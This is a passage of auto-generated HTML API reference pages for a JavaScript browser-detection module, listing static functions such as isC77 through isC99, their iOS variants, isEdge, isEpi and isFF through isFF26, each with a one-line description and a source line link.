</dl>
<h4 class="name" id=".isC77"><span class="type-signature">(static) </span>isC77<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 77.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2069">line 2069</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC77iOS"><span class="type-signature">(static) </span>isC77iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 77.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2077">line 2077</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC78"><span class="type-signature">(static) </span>isC78<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 78.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2085">line 2085</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC78iOS"><span class="type-signature">(static) </span>isC78iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 78.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2093">line 2093</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC79"><span class="type-signature">(static) </span>isC79<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 79.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2101">line 2101</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC79iOS"><span class="type-signature">(static) </span>isC79iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 79.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2109">line 2109</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC80"><span class="type-signature">(static) </span>isC80<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 80.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2117">line 2117</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC80iOS"><span class="type-signature">(static) </span>isC80iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 80.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2125">line 2125</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC81"><span class="type-signature">(static) </span>isC81<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 81.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2133">line 2133</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC81iOS"><span class="type-signature">(static) </span>isC81iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 81.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2141">line 2141</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC82"><span class="type-signature">(static) </span>isC82<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 82.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2149">line 2149</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC82iOS"><span class="type-signature">(static) </span>isC82iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 82.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2157">line 2157</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC83"><span class="type-signature">(static) </span>isC83<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 83.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2165">line 2165</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC83iOS"><span class="type-signature">(static) </span>isC83iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 83.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2173">line 2173</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC84"><span class="type-signature">(static) </span>isC84<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 84.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2181">line 2181</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC84iOS"><span class="type-signature">(static) </span>isC84iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 84.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2189">line 2189</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC85"><span class="type-signature">(static) </span>isC85<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 85.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2197">line 2197</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC85iOS"><span class="type-signature">(static) </span>isC85iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 85.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2205">line 2205</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC86"><span class="type-signature">(static) </span>isC86<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 86.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2213">line 2213</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC86iOS"><span class="type-signature">(static) </span>isC86iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 86.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2221">line 2221</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC87"><span class="type-signature">(static) </span>isC87<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 87.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2229">line 2229</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC87iOS"><span class="type-signature">(static) </span>isC87iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 87.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2237">line 2237</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC88"><span class="type-signature">(static) </span>isC88<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 88.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2245">line 2245</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC88iOS"><span class="type-signature">(static) </span>isC88iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 88.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2253">line 2253</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC89"><span class="type-signature">(static) </span>isC89<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 89.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2261">line 2261</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC89iOS"><span class="type-signature">(static) </span>isC89iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 89.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2269">line 2269</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC90"><span class="type-signature">(static) </span>isC90<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 90.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2277">line 2277</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC90iOS"><span class="type-signature">(static) </span>isC90iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 90.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2285">line 2285</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC91"><span class="type-signature">(static) </span>isC91<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 91.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2293">line 2293</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC91iOS"><span class="type-signature">(static) </span>isC91iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 91.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2301">line 2301</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC92"><span class="type-signature">(static) </span>isC92<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 92.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2309">line 2309</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC92iOS"><span class="type-signature">(static) </span>isC92iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 92.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2317">line 2317</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC93"><span class="type-signature">(static) </span>isC93<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 93.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2325">line 2325</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC93iOS"><span class="type-signature">(static) </span>isC93iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 93.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2333">line 2333</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC94"><span class="type-signature">(static) </span>isC94<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 94.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2341">line 2341</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC94iOS"><span class="type-signature">(static) </span>isC94iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 94.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2349">line 2349</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC95"><span class="type-signature">(static) </span>isC95<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 95.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2357">line 2357</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC95iOS"><span class="type-signature">(static) </span>isC95iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 95.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2365">line 2365</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC96"><span class="type-signature">(static) </span>isC96<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 96.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2373">line 2373</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC96iOS"><span class="type-signature">(static) </span>isC96iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 96.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2381">line 2381</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC97"><span class="type-signature">(static) </span>isC97<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 97.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2389">line 2389</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC97iOS"><span class="type-signature">(static) </span>isC97iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 97.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2397">line 2397</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC98"><span class="type-signature">(static) </span>isC98<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 98.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2405">line 2405</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC98iOS"><span class="type-signature">(static) </span>isC98iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 98.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2413">line 2413</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC99"><span class="type-signature">(static) </span>isC99<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome 99.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2421">line 2421</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isC99iOS"><span class="type-signature">(static) </span>isC99iOS<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Chrome for iOS 99.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line2429">line 2429</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isEdge"><span class="type-signature">(static) </span>isEdge<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if Edge.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line129">line 129</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isEpi"><span class="type-signature">(static) </span>isEpi<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Return true if Epiphany</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line1017">line 1017</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF"><span class="type-signature">(static) </span>isFF<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line945">line 945</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF2"><span class="type-signature">(static) </span>isFF2<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF2.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line145">line 145</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF3"><span class="type-signature">(static) </span>isFF3<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF3.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line153">line 153</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF3_5"><span class="type-signature">(static) </span>isFF3_5<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF3.5.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line161">line 161</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF3_6"><span class="type-signature">(static) </span>isFF3_6<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF3.6.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line169">line 169</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF4"><span class="type-signature">(static) </span>isFF4<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF4.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line177">line 177</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF5"><span class="type-signature">(static) </span>isFF5<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF5.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line185">line 185</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF6"><span class="type-signature">(static) </span>isFF6<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF6.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line193">line 193</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF7"><span class="type-signature">(static) </span>isFF7<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF7.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line201">line 201</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF8"><span class="type-signature">(static) </span>isFF8<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF8.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line209">line 209</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF9"><span class="type-signature">(static) </span>isFF9<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF9.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line217">line 217</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF10"><span class="type-signature">(static) </span>isFF10<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF10.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line225">line 225</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF11"><span class="type-signature">(static) </span>isFF11<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF11.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line233">line 233</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF12"><span class="type-signature">(static) </span>isFF12<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF12</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line241">line 241</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF13"><span class="type-signature">(static) </span>isFF13<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF13</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line249">line 249</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF14"><span class="type-signature">(static) </span>isFF14<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF14</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line257">line 257</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF15"><span class="type-signature">(static) </span>isFF15<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF15</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line265">line 265</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF16"><span class="type-signature">(static) </span>isFF16<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF16</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line273">line 273</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF17"><span class="type-signature">(static) </span>isFF17<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF17</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line281">line 281</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF18"><span class="type-signature">(static) </span>isFF18<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF18</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line289">line 289</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF19"><span class="type-signature">(static) </span>isFF19<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF19</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line297">line 297</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF20"><span class="type-signature">(static) </span>isFF20<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF20</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line305">line 305</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF21"><span class="type-signature">(static) </span>isFF21<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF21</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line313">line 313</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF22"><span class="type-signature">(static) </span>isFF22<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF22</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line321">line 321</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF23"><span class="type-signature">(static) </span>isFF23<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF23</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line329">line 329</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF24"><span class="type-signature">(static) </span>isFF24<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF24</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line337">line 337</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF25"><span class="type-signature">(static) </span>isFF25<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF25</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line345">line 345</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".isFF26"><span class="type-signature">(static) </span>isFF26<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Returns true if FF26</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="browser.js.html">browser.js</a>, <a href="browser.js.html#line353">line 353</a>
</li></ul></dd>
</dl>
